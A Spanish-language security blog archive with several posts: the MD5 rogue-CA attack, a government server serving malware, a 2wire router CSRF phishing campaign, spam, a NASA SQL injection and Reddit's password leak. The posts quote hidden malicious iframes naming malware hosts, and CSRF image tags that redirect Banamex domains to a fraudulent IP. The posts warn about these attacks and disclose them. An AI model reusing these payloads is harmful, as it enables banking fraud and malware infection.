Category Archives: seguridad

HTTPS y SSL ya no pueden ser considerados seguros

El día de hoy podría marcar un hito en la historia de la seguridad en Internet. Por primera vez se ha descubierto una “vulnerabilidad” que de ser explotada podría poner al comercio y a Internet de cabeza.

En un trabajo realizado por diversos investigadores y presentado el dia de hoy, hace unos minutos. en la ” 25th Chaos Communication Congress”, investigadores de diversos lugares del mundo presentaron la conferencia “MD5 considered harmful today” en la cual presentaron un metodo mediante el cual pueden generar certificados CA validos, con lo cual podrian generar un certificado SSL para cualquier pagina, lo que implicaría que ninguna pagina HTTPS podría ser considerada como autentica o segura, lo cual afectaría seriamente a las actividades financieras por Internet.

El ataque, aunque no esta al alcance de todos, podría ser posible para ciertos laboratorios, gobiernos o criminales que controlen “botnets”.

Como dato curioso, los investigadores hicieron uso del Playstation3Lab, que les proporciono un cluster con mas de 200 PS3 interconectados actuando como una sola maquina.

ps3cluster

Los usuarios ahora no pueden prevenir este ataque. La prevención de este ataque esta en manos de las autoridades certificadoras (CA) y si acaso, tal vez, del trabajo en conjunto de los creadores de navegadores. Sin embargo, una solución definitiva tomara tiempo, ya que se tendrían que reemplazar los certificados emitidos hasta el día de hoy que contengan las características vulnerables.

El papel apenas fue presentado el dia de hoy, hace algunos minutos y no se sabe aun de algun intento de explotarla en el pasado por algún otro investigador o criminal, aunque es improbable que esto sea, por la magnitud de esfuerzo necesaria para replicarla.

Puedes ver una prueba de concepto en:

https://i.broke.the.internet.and.all.i.got.was.this.t-shirt.phreedom.org/

Para verificarla tienes que poner la fecha de tu computadora anterior a agosto de 2004.
Hay mas información en la pagina de los investigadores: http://www.phreedom.org/research/rogue-ca/

Detalles técnicos, debajo de esta linea. Si no te interesan, puedes dejar de leer aqui.

Update:

Microsoft ya respondio a este aviso diciendo que no se conocen ataques a MD5, por lo que no se planea hacer nada. Y que como no hay exploit disponible, pues todo esta super. Dios nos agarre confesados.


La vulnerabilidad explota la debilidad de MD5 como función criptográfica, la cual se sabe ya desde hace tiempo (por lo menos desde 2004) que es débil y susceptible a ataques, por lo que se ha sugerido que se deje de usar para propósitos de seguridad.

Este ataque, mas concretamente, ataca la PKI (public key infraestructure), que es uno de los pilares de la confianza de los sitios seguros.

El problema se encontró en algunos CA los cuales generan certificados con MD5, encontrando colisiones en los hash generados. Gracias a esto ellos pudieron generar un certificado CA, con el cual se pueden generar certificados idénticos a los que usaría cualquier pagina que use HTTPS.

HTTPS y SSL funciona mediante una cadena de confianza. El root CA delega la confianza a los  CA intermedios y a su vez, los usuarios confían estos CA.  Dado que los navegadores comprueban la autenticidad de estos verificando contra los CA intermedios, el navegador no podría distinguir entre un certificado original y uno falso, ya que, en esencia, serian iguales.

attack

diagrama del ataque

El peligro de esta vulnerabilidad es que se podría conjuntar con otras vulnerabilidades, como la anunciada por Dan Kaminsky[PDF] sobre el DNS poisoning, con lo cual se podría clonar cualquier pagina segura sin posibilidad de verificar si es segura o no. Ademas podría tener otras implicaciones no previstas, lo cual podremos ver, seguramente, en un futuro.

Como verificar si tu certificado es susceptible de ser vulnerable?

Entra pagina y ve los detalles del certificado. En la parte de algoritmo si hace mención a “MD5”, entonces si es vulnerable a este ataque.

Detalles del certificado - Algoritmo

Detalles del certificado - Algoritmo

Para detalles aún más técnicos, ve el papel original. El equipo de investigadores menciona que el papel aun no esta terminado, pero debera estar disponible en la primer mitad del proximo año.

Servidor de la Cámara de diputados distribuye Malware

No, no es esa otra noticia, donde un niño de 14 años les cambio la portada a la pagina de la cámara de  diputados. Ni tampoco esa noticia donde guardaban porno y lo ponían disponible a quien lo quisiera bajar. Ni tampoco esa otra donde exponían el archivo shadow (de usuarios y contraseñas de unix) directo para quien lo quiera ver en la cámara de diputados.

Esta es otra historia diferente.

Después  leer la noticia del chamaco de 14 años, y de 5 minutos de investigación, encontré que la cámara de diputados tiene un servidor publico en el que muy alegremente distribuyen Malware.

Para los que lo quieran ver, y mientras dure, el servidor es este:

http://pac.diputados.gob.mx

Advertencia: Les recomiendo que visiten la pagina con firefox, noscript y antivirus instalado. O con Linux :). De lo contrario podrían convertirse en zombies y un cachorro morirá. (La parte de los zombies es cierta :P)

La pagina tiene el siguiente código:

   1: <iframe src="http://www.bsupport.clara.net/cgi/" frameborder="0" width="0" height="0"></iframe>
   2: <iframe src="http://oscentolos.com/cgi/" frameborder="0" width="0" height="0"></iframe>
   3: <iframe src="http://thatsentertainmentinoz.com.au/log/" frameborder="0" width="0" height="0"></iframe>
   4: <iframe src="http://www.kawaart.com/cgi/" frameborder="0" width="0" height="0"></iframe>
   5: <iframe src="http://www.lindomar.com.br/cgi/index.html" frameborder="0" width="0" height="0"></iframe>
   6: <iframe src="http://www.youtube.com/watch?v=jTah9ckvV3Y" frameborder="0" width="0" height="0"></iframe>
   7: <iframe src="http://mavideniz1.org/forum/" frameborder="0" width="0" height="0"></iframe>
   8: <iframe src="http://siyamiozkan.com.tr/forum" frameborder="0" width="0" height="0"></iframe>
   9: <iframe src="http://mavi1.org/" frameborder="0" width="0" height="0"></iframe>
  10: <iframe src="http://mavideniz1.org/" frameborder="0" width="0" height="0"></iframe>

Algunos de esos sitios distribuyen malware.

Llama la atención que también hacen links a un vídeo de youtube. Al mostrar el vídeo queda claro quien fue el  responsable del deface. Al parecer el responsable fue iskorpitx un hacker turco que se hizo famoso tras un  incidente con miles de servidores.

Lo preocupante del asunto es que una vez que se tiene acceso a un servidor, se puede crear una reacción en cadena y tener acceso a los demás servidores de la red de la cámara de diputados. Y dada la laxa seguridad y control que tienen sobre su red, no dudaría que varios de estos servidores sean controlados por gente ajena a la administración.

Y tal vez este deface sea el menor de sus problemas, cuando su servidor DNS esta exponiendo toda la zona a quien quiera verla.  Es decir, con un simple comando en la consola tu puedes obtener la lista de todos sus servidores públicos.

Y ya ni hablar de que tienen una versión vieja (y vulnerable) de su software de acceso a su base de datos, visible para todo el publico (debo aceptar que cuando vi esto, mi palma dio una rapida visita a mi frente).

Pantallazo-phpMyAdmin 2.10.1 - Minefield

Es lamentable y preocupante como se lleva la política de administración de estos servidores. Mas preocupante aun cuando el responsable de esto asegura que su seguridad es “estable” y que el problema no existe.

Cuando se es incapaz de ver el problema, es imposible arreglarlo. Casos como estos se seguirán repitiendo. Todo, pagado por nuestros impuestos.

Eres programador independiente? Licencia tu trabajo

535px-Heckert_GNU_white.svg Pues eso, lo que dice el titulo de la entrada. Si eres un programador independiente (o un programador en general, en realidad) siempre, siempre siempre, incluye una licencia en tu trabajo, no importa que sea un pequeño pedazo de código que publicaste en tu  blog, o una trabajo open source.

Puedes escoger mil y un licencias, seguramente habrá una que se adapte a lo que tu quieras.

Esto viene a colación por un caso que ha pasado últimamente y que ha llamado la atención de los medios especializados.

Paint.net es un programa open source para edición de imágenes en windows. Cabe decir que es un muy buen paquete y muy sencillo de usar. Yo lo uso cotidianamente. Pues resulta que un programador  tomo el código fuente de Paint.Net, le borró las licencias, le cambio el nombre y se puso el como autor para comercializar el producto.

Cuando el autor original se enteró, se armó toda una telenovela. Entre otras cosas, decidió que cerraría (al menos en parte) el código para evitar futuros robos. El programador que copio el código es ya un viejo veterano en robo de código. Inclusive intento hacer pasar Doom como suyo (aquí la saga completa).En su pagina (http://www.ultra-software.com/MyProducts.html, no añado link para no ayudarle :)) tiene otras joyitas de trabajos que intento hacer pasar por suyos.

Estos casos son muy comunes en el ambiente del software libre, por lo que repito y recomiendo: Escoge una licencia. Hay muchas para escoger, entre otras:

Sin esto, no podrás defender tu trabajo. Cada una de estas licencias tiene su sus características propias. Por ejemplo la licencia MIT permite rehusar el código fuente en software propietario mientras se conserve la atribución, mientras que la GPL necesita que se revele el código fuente del software derivado. Cada licencia tiene sus propios términos, por lo que te recomiendo que leas e investigues al respecto.

En caso de que encuentres que tu software esta siendo mal usado, lo primero que debes hacer es pedir de manera formal que tu software sea usado en términos diferentes a los que tu deseas.

En caso de que no se cumpla, puedes demandar y pedir compensación y muy probablemente, tienes las de ganar. La GPL tiene muy buen registro en casos de violaciones al uso de la licencia. De hecho acaba de ganar un caso a favor de los desarrolladores de BusyBox, una herramienta de línea de de comandos.

En cualquier caso, deberás asesorarte con un abogado para verificar los detalles. También te puedes acercar a la Software Freedom Law Center y ellos te pueden asesorar e incluso defender si la situación lo amerita.

No te registres a nipper.com.mx

Ultimamente hay muchos anuncios en la television de nipper.com.mx, intentando crear una publicidad viral o algo asi.

Mi recomendacion es, por el momento, no te registres. Su sitio tiene serios (a.k.a. de novato) problemas de seguridad. Tus datos podrian ser robados. Especialmente porque sera una plataforma de medios de pagos electronicos. Mas info aqui: http://www.fimpe.org.mx/), especificamente aqui: http://www.fimpe.org.mx/pagos.html

Por cierto, alguien tiene su contacto? Los he intentado contactar, pero en su pagina no tienen informacion de contacto. YA intente con los de hola-tu.com que por lo menos, estan relacionados (Los dns de nipper.com.mx son los de hola-tu), pero sigo esperando.

Este post se borrara (o por lo menos actualizara) en cuanto pueda contactarlos y corrijan esos problemas de seguridad.

Nuevo tipo de phishing ataca a clientes de Prodigy Infinitum

El dia de ayer recibi un correo de phising con una tarjeta de gusanito.com. Esto no seria nada sorprendente si no fuera por el nuevo metodo que estas personas estan utilizando.

Al hacer clic en el link fraudulento, me llevaba a una pagina de lo que parecia ser una tarjeta de gusanito.com comun y corriente. Al revisar el codigo tenia unas lineas similares a estas (detalles peligrosos omitidos)

 

<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=www.bancanetempresarial.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=bancanetempresarial.banamex.com.mx&ADDR=[IPDELSITIOFRAUDULENTO] ">
<img alt="" src="http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME=boveda.banamex.com&ADDR=[IPDELSITIOFRAUDULENTO] ">

 

Entre otras lineas similares. Estas lineas hacen uso de una vulnerabilidad de tipo CSRF de los routers 2wire inalambricos que son los que telmex regala a sus suscriptores de infinitum.

Lo que esta vulnerabilidad provoca, es que hace un cambio a los dns del router (AFAIK, no tengo un modem 2wire para probar ahora mismo)  para que cada vez que alguien accese a la banca en linea de banamex, en realidad entres al sitio fraudulento. Basicamente usa la CSRF para realizar un DNS poisoning. Y ni tu navegador, ni tu antivirus, ni tu firewall se darian cuenta. Seria transparante para el usuario.

Esta vulnerabilidad es especialmente peligrosa porque no es necesario que el usuario ejecute ningun archivo, ni que baje nada. Simplemente entrando a la pagina o si su lector de correo muestra la imagen, el daño estaria hecho.

Como siempre, se recomienda que no abran correos que no estan esperando o de gente que no conozcan y usen un cliente de correo decente como thunderbird, que avisa cuando el texto del enlace no coincide con el enlace mismo. Ademas cambiene la contraseña a su router, revisen periodicamente su configuracion o de plano cambien de router. Con esta vulnerabilidad se puede cambiar toda la configuracion del router. Desde cambiar la contraseña de administrador, activar o desactivar el wireless, activar o desactivar el firewall, etc.

Mas informacion de la vulnerabilidad aqui: http://securityreason.com/securityalert/3026

Telcel y el SPAM

Al parecer, de un tiempo para aca, Telcel esta teniendo la mala mania de enviar mensajes no solicitados a algunos numeros de celular. Por ejemplo:

   

El envio de estos mensajes es simple y llanamente SPAM. Segun wikipeda:

Spam son mensajes no solicitados, habitualmente de tipo publicitario, enviados en cantidades masivas que perjudican de una u otra manera al receptor. Aunque se puede hacer por distintas vías, la más utilizada entre el público en general es la basada en el correo electrónico. Otras tecnologías de internet que han sido objeto de correo basura incluyen grupos de noticias usenet, motores de búsqueda, wikis, foros y blogs. El correo basura también puede tener como objetivo los teléfonos móviles (a través de mensajes de texto) y los sistemas de mensajería instantánea.

Es algo que se debe denunciar energicamente. Si hoy no lo hacemos, que le impide a telcel en vender la base de datos de usuarios a una compañia de publicidad? O ellos mismos empezar a hacer el servicio de telemercadeo con una base de mas de 40 millones de usuarios?

¿Que se puede hacer contra esto (y contra el spam en general)?

1. Pedir a telcel por un medio formal (un correo electronico basta) que no deseas recibir mensajes no solicitados. (ya veran porque)

2. Ya hace tiempo hable de una posible ley que estaban promoviendo la condusef y la profeco sobre la proteccion de datos personales, que al parecer no paso mucho con ella. Sin embargo ya hay una ley que nos protege. Especificamente la ley federal de proteccion al consumidor que dice en sus articulo VII Bis lo siguiente:

I. El proveedor utilizará la información proporcionada por el consumidor en forma confidencial, por lo que no podrá difundirla o transmitirla a otros proveedores ajenos a la transacción, salvo autorización expresa del propio consumidor o por requerimiento de autoridad competente;

VI. El proveedor respetará la decisión del consumidor en cuanto a la cantidad y calidad de los productos que desea recibir, así como la de no recibir avisos comerciales

Es decir, ES ILEGAL ENVIAR MENSAJES NO SOLICITADOS. El spam, desde 2004 (fecha en la que se hizo esta reforma), es ILEGAL en Mexico.

3. En caso de que la compañia no cumpla con una solicitud para no recibir mensajes no solicitados, se debe denunciar ante la PROFECO que esta obligada a dar seguimiento a la queja y en su caso, resolverla. En caso de proceder la queja, el infractor podria recibir una multa de entre $479.17 a $1’874,091.79 la segun el articulo 128 de la misma ley. 

En esta pagina, la PROFECO provee de mas informacion sobre que es el spam y como combatirlo. Y aqui hay informacion de como levantar la denuncia.

La denuncia es una de las pocas armas que tenemos los ciudadanos contra este tipo de practicas abusivas. Hay que hacer valer ese derecho. 

 

 

Sql Inyection en Nasa

Michoacano me paso el tip.

http://www.michoacano.com.mx/2007/05/10/%c2%bfsql-injection-en-la-pagina-de-la-nasa/

La pagina de la nasa, en especial la dedicada al cambio climatico tiene un error de novatos de inyeccion de sql.

Para los que piensan que aventando dinero a un problema lo soluciona, este es el ejemplo de que no. A final de cuentas, los que ejecutan las ordenes son personas comunes y corrientes, que cometen errores.

Las organizaciones sirven para evitar que se cometan errores, pero tienen un defecto: esta compuesta de personas.

Aqui les dejo un screenshot del problema. Y como bien dice Julio (michoacano): A ver quien es el guapo que le hace algo a la pagina de la nasa.

nasasql.JPG

Robo de cuentas bancarias y el status en mexico

Hoy Ars-Tecnica publica un articulo en el que describen el mayor robo de cuentas bancarias de la historia. Se trata del robo de POR LO MENOS 45 millones de numeros de tarjetas de credito a la empresa T.J. Maxx. Se cree que el numero es MUCHO mas grande. No solo se robaron datos bancarios, sino tambien personales, lo cual hace aun mas grave el robo.

Al parecer hackers (esos benditos entes amorfos que se presentan en cada problema con algun sistem informatico) instalaron sistemas que robaban los datos de dicha empresa. Lo curioso es que paso mas de un año sin que nadie se diera cuenta de dichos sistemas.

Pero que hay de mexico? Hace tiempo la comision bancaria y de valores pidio a los bancos sistemas de seguridad para el acceso a la banca por via electronica, los famosos candados o netkeys o las tarjetas de acceso seguro. Es un buen paso, sin embargo es como poner una reja electrificada en una casa que el switch electrico a la mano de todos.

¿Porque digo esto?. Conozco de primera mano como se llevan los procesos internos en varios bancos (los cuales no nombrare) y el manejo de la informacion, es por decirlo menos, lamentable. Al dia de hoy, los empleados que trabajan en oficinas centrales pueden acceder a millones de cuentas, bajarlas a un disco en excel y llevarselas en un disco a su casa. Digo esto porque LO HE VISTO. He visto las memorias usb llenas de archivos de excel con numeros de cuentas y los propietarios (empleados del banco) solo dicen “no las vayas a copiar, esa usb vale millones de pesos” (je je!). Al dia de hoy no hay el mas minimo cuidado de la informacion de la persona.

Hace tiempo reporte de una iniciativa de ley  para la proteccion de los datos personales. Sin embargo esta aun no se ha aprobado  y no hay visos de que asi vaya a ser.

En mexico estamos terriblemente expuestos a que alguien realice un fraude con nuestro numero de tarjeta y los bancos te tratan primero como sospechoso que como usuario.

Es triste saber que poco podemos hacer, fuera de lo que ya hacemos, no esta en nuestras manos. Talvez lo unico que podamos hacer es gritar, hacer que nos escuchen, hacer mas articulos como estos, hacer ruido. Ojala que los responsables de esto, bancos y gobierno nos escuchen. El balon esta en su cancha.

Reddit, seguridad y robo de contraseñas

Si alguien es usuario asiduo de Reddit talvez noto que hubo fallas en los servidores en esta semana. Ayer los programadores de reddit ofrecieron una disculpa por las fallas, pero revelaron otra cosa mucho mas interesante. Al parecer una parte de un respaldo de la base de datos de reddit fue robado y con el muchos nombres de usuario y contraseña.

Esto es sospechoso por dos motivos.

  1. Usualmente un respaldo de una base de datos no se hace en partes a menos que sea enooooooorme, del orden de muchos GB o TB. Y reddit no tiene tanto tiempo de activo, y solo guarda pequeños datos tipo texto por registro, aunque por supuesto, podria estar terriblemente equivocado 🙂
  2. Segundo, y mucho mucho mas importante. Si es posible que hayan robado usuarios y contraseñas quiere decir que estos estaban almacenados en texto plano.

Aqui es donde las alarmas se encienden. Este es un error super basico en el desarrollo de aplicacione seguras (y que yo cometi cuando empece, debo aceptar :P). NUNCA NUNCA NUNCA (y repito, NUNCA) guardes contraseñas en texto plano.

Es muy sencillo implementar el guardado de contraseñas mediante un hash + salt. El que no sepa, que pregunte. (si alguien lo requiere puedo poner un articulo al respecto)

Una vez que alguien se haga de las contraseñas de la base de datos, toda tu aplicacion estara abierta. Si tu crees que eres invulnerable o que tu sistema no le importa a los hackers, piensalo dos veces. En el caso de reddit tienen informacion privada, como correos electronicos. Una vez que tienen la contraseña, pueden intentar ingresar a esos correos con la misma contraseña y de ahi saltar hasta a servicios bancarios (lo cual es una razon mas para no guardar tus contraseñas en el correo electronico :P). En tu caso puede ser informacion aun mas sensible como informacion bancaria, nombres, direcciones, telefonos u otra informacion que permita identificar a tus usuarios. Teniendo esta informacion, para los hackers solo les falta un paso al cielo… y a sus cuentas bancarias, o peor…

Si valoras a tus usuarios (y a tu integridad fisica y economica), documentate por lo menos de los tips minimos de seguridad. O atente a las consecuencias.